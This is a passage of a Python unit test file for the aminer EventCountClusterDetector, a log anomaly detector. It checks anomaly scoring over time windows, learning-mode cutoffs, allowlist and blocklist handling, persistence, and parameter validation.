LogAtom(b"ax", ParserMatch(MatchElement("/p", b"ax", b"ax", [m19, m20])), t+43, None) eccd = EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=["/p/value"], id_path_list=["/p/id"], window_size=10, num_windows=50, confidence_factor=0.5, idf=True, norm=False, add_normal=False, check_empty_windows=False, learn_mode=True, output_logline=False) # Forward log atoms to detector eccd.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), "") eccd.receive_atom(log_atom2) self.assertEqual(self.output_stream.getvalue(), "") eccd.receive_atom(log_atom3) self.assertEqual(self.output_stream.getvalue(), "") eccd.receive_atom(log_atom4) # End of first time window; first count vector triggers anomaly for x self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 13).strftime(dtf), eccd.__class__.__name__, 1, "ax")) self.reset_output_stream() eccd.receive_atom(log_atom5) # End of first time window; first count vector triggers anomaly for y self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 14).strftime(dtf), eccd.__class__.__name__, 1, "ay")) self.reset_output_stream() eccd.receive_atom(log_atom6) self.assertEqual(self.output_stream.getvalue(), "") eccd.receive_atom(log_atom7) self.assertEqual(self.output_stream.getvalue(), "") eccd.receive_atom(log_atom8) # No anomaly reported for x since 2 times a and 1 time b (window 1) is similar enough to 1 time a and 1 time b (window 2) self.assertEqual(self.output_stream.getvalue(), "") eccd.receive_atom(log_atom9) self.assertEqual(self.output_stream.getvalue(), "") eccd.receive_atom(log_atom10) # Check learned count vectors at end of third time window # For x, count vector from first and third windows are included in model; for y only first window self.assertEqual(eccd.known_counts, {("x",): [{("a",): 1, ("b",): 1}, {("c",): 1, ("b",): 1}], ("y",): [{("a",): 1}]}) # Since a occurs in both x and y, its idf factor is only 0.176 (=log10(3/2)), # compared to b and c which have an idf factor of 0.477 (=log10(3/1)). # Comparing the count vectors for x in the first and third window, we see that # a occurs only in first window, which increases diff to 0.176/0.176 # b occurs once in first and third windows, which updates diff to 0.176/0.653 # c occurs only in third window, which increases diff to 0.653/1.13 # The final score is thus 0.653/1.13=0.578, which exceeds the threshold of 0.5. self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 43).strftime(dtf), eccd.__class__.__name__, 1, "ax")) # stop_learning_time eccd = EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=["/p/value"], id_path_list=["/p/id"], window_size=10, num_windows=50, confidence_factor=0.5, idf=True, norm=False, add_normal=False, check_empty_windows=False, learn_mode=True, output_logline=False, stop_learning_time=100) self.assertTrue(eccd.receive_atom(log_atom1)) log_atom1.atom_time = t + 99 self.assertTrue(eccd.receive_atom(log_atom1)) self.assertTrue(eccd.learn_mode) log_atom1.atom_time = t + 102 self.assertTrue(eccd.receive_atom(log_atom1)) self.assertFalse(eccd.learn_mode) # stop_learning_no_anomaly_time eccd = EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=["/p/value"], id_path_list=["/p/id"], window_size=10, num_windows=50, confidence_factor=0.5, idf=True, norm=False, add_normal=False, check_empty_windows=False, learn_mode=True, output_logline=False, stop_learning_no_anomaly_time=100) log_atom1.atom_time = t self.assertTrue(eccd.receive_atom(log_atom1)) log_atom1.atom_time = t + 100 self.assertTrue(eccd.receive_atom(log_atom1)) self.assertTrue(eccd.learn_mode) log_atom2.atom_time = t + 100 self.assertTrue(eccd.receive_atom(log_atom2)) self.assertTrue(eccd.learn_mode) log_atom1.atom_time = t + 200 self.assertTrue(eccd.receive_atom(log_atom3)) self.assertTrue(eccd.learn_mode) log_atom1.atom_time = t + 201 self.assertTrue(eccd.receive_atom(log_atom1)) self.assertFalse(eccd.learn_mode) def test2do_timer(self): """Test if the do_timer method is implemented properly.""" eccd = EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler]) t = time.time() eccd.next_persist_time = t + 400 self.assertEqual(eccd.do_timer(t + 200), 200) self.assertEqual(eccd.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD) self.assertEqual(eccd.do_timer(t + 999), 1) self.assertEqual(eccd.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD) def test3allowlist_event(self): """Test if the allowlist_event method is implemented properly.""" # This test case checks whether an exception is thrown when entering an event of another class. eccd = EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler]) analysis = "Analysis.%s" self.assertRaises(Exception, eccd.allowlist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None) # The EventCountClusterDetector can not handle allowlisting data and therefore an exception is expected. self.assertRaises(Exception, eccd.allowlist_event, analysis % eccd.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"]) # This test case checks in which cases an event is triggered and compares with expected results. self.assertEqual(eccd.allowlist_event(analysis % eccd.__class__.__name__, "/s1", None), "Allowlisted path %s in %s." % ("/s1", analysis % eccd.__class__.__name__)) self.assertEqual(eccd.constraint_list, ["/s1"]) eccd.learn_mode = False self.assertEqual(eccd.allowlist_event(analysis % eccd.__class__.__name__, "/d1", None), "Allowlisted path %s in %s." % ("/d1", analysis % eccd.__class__.__name__)) self.assertEqual(eccd.constraint_list, ["/s1", "/d1"]) def test4blocklist_event(self): """Test if the blocklist_event method is implemented properly.""" # This test case checks whether an exception is thrown when entering an event of another class. eccd = EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler]) analysis = "Analysis.%s" self.assertRaises(Exception, eccd.blocklist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None) # The EventCountClusterDetector can not handle allowlisting data and therefore an exception is expected. self.assertRaises(Exception, eccd.blocklist_event, analysis % eccd.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"]) # This test case checks in which cases an event is triggered and compares with expected results. self.assertEqual(eccd.blocklist_event(analysis % eccd.__class__.__name__, "/s1", None), "Blocklisted path %s in %s." % ("/s1", analysis % eccd.__class__.__name__)) self.assertEqual(eccd.ignore_list, ["/s1"]) eccd.learn_mode = False self.assertEqual(eccd.blocklist_event(analysis % eccd.__class__.__name__, "/d1", None), "Blocklisted path %s in %s." % ("/d1", analysis % eccd.__class__.__name__)) self.assertEqual(eccd.ignore_list, ["/s1", "/d1"]) def test5persistence(self): """Test the do_persist and load_persistence_data methods.""" t = time.time() eccd = EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=["/p/value"], id_path_list=["/p/id"], window_size=10, num_windows=50, confidence_factor=0.5, idf=True, norm=False, add_normal=False, check_empty_windows=False, learn_mode=True, output_logline=False) m1 = MatchElement("/p/value", b"a", b"a", None) m2 = MatchElement("/p/id", b"x", b"x", None) log_atom1 = LogAtom(b"ax", ParserMatch(MatchElement("/p", b"ax", b"ax", [m1, m2])), t + 1, None) m3 = MatchElement("/p/value", b"a", b"a", None) m4 = MatchElement("/p/id", b"y", b"y", None) log_atom2 = LogAtom(b"ay", ParserMatch(MatchElement("/p", b"ay", b"ay", [m3, m4])), t + 2, None) m5 = MatchElement("/p/value", b"b", b"b", None) m6 = MatchElement("/p/id", b"x", b"x", None) log_atom3 = LogAtom(b"bx", ParserMatch(MatchElement("/p", b"bx", b"bx", [m5, m6])), t + 3, None) # Start of window 2: m7 = MatchElement("/p/value", b"a", b"a", None) m8 = MatchElement("/p/id", b"x", b"x", None) log_atom4 = LogAtom(b"ax", ParserMatch(MatchElement("/p", b"ax", b"ax", [m7, m8])), t + 13, None) m9 = MatchElement("/p/value", b"a", b"a", None) m10 = MatchElement("/p/id", b"y", b"y", None) log_atom5 = LogAtom(b"ay", ParserMatch(MatchElement("/p", b"ay", b"ay", [m9, m10])), t + 14, None) m11 = MatchElement("/p/value", b"b", b"b", None) m12 = MatchElement("/p/id", b"x", b"x", None) log_atom6 = LogAtom(b"bx", ParserMatch(MatchElement("/p", b"bx", b"bx", [m11, m12])), t + 15, None) m13 = MatchElement("/p/value", b"a", b"a", None) m14 = MatchElement("/p/id", b"x", b"x", None) log_atom7 = LogAtom(b"ax", ParserMatch(MatchElement("/p", b"ax", b"ax", [m13, m14])), t + 16, None) # Start of window 3: m15 = MatchElement("/p/value", b"c", b"c", None) m16 = MatchElement("/p/id", b"x", b"x", None) log_atom8 = LogAtom(b"cx", ParserMatch(MatchElement("/p", b"cx", b"cx", [m15, m16])), t + 23, None) m17 = MatchElement("/p/value", b"b", b"b", None) m18 = MatchElement("/p/id", b"x", b"x", None) log_atom9 = LogAtom(b"bx", ParserMatch(MatchElement("/p", b"bx", b"bx", [m17, m18])), t + 24, None) # Start of window 4: m19 = MatchElement("/p/value", b"a", b"a", None) m20 = MatchElement("/p/id", b"x", b"x", None) log_atom10 = LogAtom(b"ax", ParserMatch(MatchElement("/p", b"ax", b"ax", [m19, m20])), t + 43, None) eccd.receive_atom(log_atom1) eccd.receive_atom(log_atom2) eccd.receive_atom(log_atom3) eccd.receive_atom(log_atom4) eccd.receive_atom(log_atom5) eccd.receive_atom(log_atom6) eccd.receive_atom(log_atom7) eccd.receive_atom(log_atom8) eccd.receive_atom(log_atom9) eccd.receive_atom(log_atom10) eccd.do_persist() self.maxDiff = None with open(eccd.persistence_file_name, "r") as f: self.assertEqual(f.read(), '[[[["string:x"], [[[["string:a"], 1], [["string:b"], 1]], [[["string:b"], 1], [["string:c"], 1]]]], [["string:y"], [[[["string:a"], 1]]]]], [["string:x"], ["string:y"]], [[["string:a"], [["string:x"], ["string:y"]]], [["string:b"], [["string:x"]]], [["string:c"], [["string:x"]]]]]') self.assertEqual(eccd.known_counts, {('x',): [{('a',): 1, ('b',): 1}, {('c',): 1, ('b',): 1}], ('y',): [{('a',): 1}]}) self.assertEqual(eccd.idf_total, {('x',), ('y',)}) self.assertEqual(eccd.idf_counts, {('a',): {('x',), ('y',)}, ('b',): {('x',)}, ('c',): {('x',)}}) eccd.load_persistence_data() self.assertEqual(eccd.known_counts, {('x',): [{('a',): 1, ('b',): 1}, {('c',): 1, ('b',): 1}], ('y',): [{('a',): 1}]}) self.assertEqual(eccd.idf_total, {('x',), ('y',)}) self.assertEqual(eccd.idf_counts, {('a',): {('x',), ('y',)}, ('b',): {('x',)}, ('c',): {('x',)}}) other = EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=["/p/value"], id_path_list=["/p/id"], window_size=10, num_windows=50, confidence_factor=0.5, idf=True, norm=False, add_normal=False, check_empty_windows=False, learn_mode=True, output_logline=False) self.assertEqual(other.known_counts, eccd.known_counts) self.assertEqual(other.idf_total, eccd.idf_total) self.assertEqual(other.idf_counts, eccd.idf_counts) def test6validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, ["default"]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, None) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, "") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, b"Default") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, True) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, 123) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, 123.3) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, {"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, ()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, set()) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=[""]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list="") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=b"Default") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=True) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=123) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=123.3) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=[]) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=None) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], window_size=-1) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], window_size=0) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], window_size=b"Default") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], window_size="123") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], window_size={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], window_size=["Default"]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], window_size=[]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], window_size=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], window_size=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], window_size=100) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], window_size=100.22) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=[""]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list="") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=b"Default") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=True) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=123) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=123.3) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=[]) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=None) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows=-1) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows=0) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows=100.22) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows=b"Default") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows="123") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows=["Default"]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows=[]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], num_windows=100) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor=-1) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor=1.1) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor=b"Default") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor="123") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor=["Default"]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor=[]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], confidence_factor=0) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], confidence_factor=0.5) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], confidence_factor=1) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], idf=True) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"], idf=b"True") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"], idf="True") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"], idf=123) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"], idf=123.22) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"], idf={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"], idf=["Default"]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"], idf=[]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"], idf=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"], idf=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"], idf=True) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], norm=b"True") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], norm="True") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], norm=123) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], norm=123.22) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], norm={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], norm=["Default"]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], norm=[]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], norm=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], norm=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], norm=True) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], add_normal=b"True") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], add_normal="True") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], add_normal=123) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], add_normal=123.22) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], add_normal={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], add_normal=["Default"]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], add_normal=[]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], add_normal=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], add_normal=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], add_normal=True) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], check_empty_windows=b"True") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], check_empty_windows="True") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], check_empty_windows=123) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], check_empty_windows=123.22) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], check_empty_windows={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], check_empty_windows=["Default"]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], check_empty_windows=[]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], check_empty_windows=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], check_empty_windows=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], check_empty_windows=True) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id="") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=None) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=b"Default") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=True) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=123) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=123.22) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=["Default"]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=[]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], persistence_id="Default") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=b"True") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode="True") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=123) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=123.22) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=["Default"]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=[]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=None) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=b"True") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline="True") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=123) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=123.22) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=["Default"]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=[]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], output_logline=True) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=[""]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list="") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=b"Default") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=True) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=123) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=123.3) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], ignore_list=[]) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], ignore_list=None) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=[""]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list="") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=b"Default") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=True) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=123) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=123.3) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], constraint_list=[]) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], constraint_list=None) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) 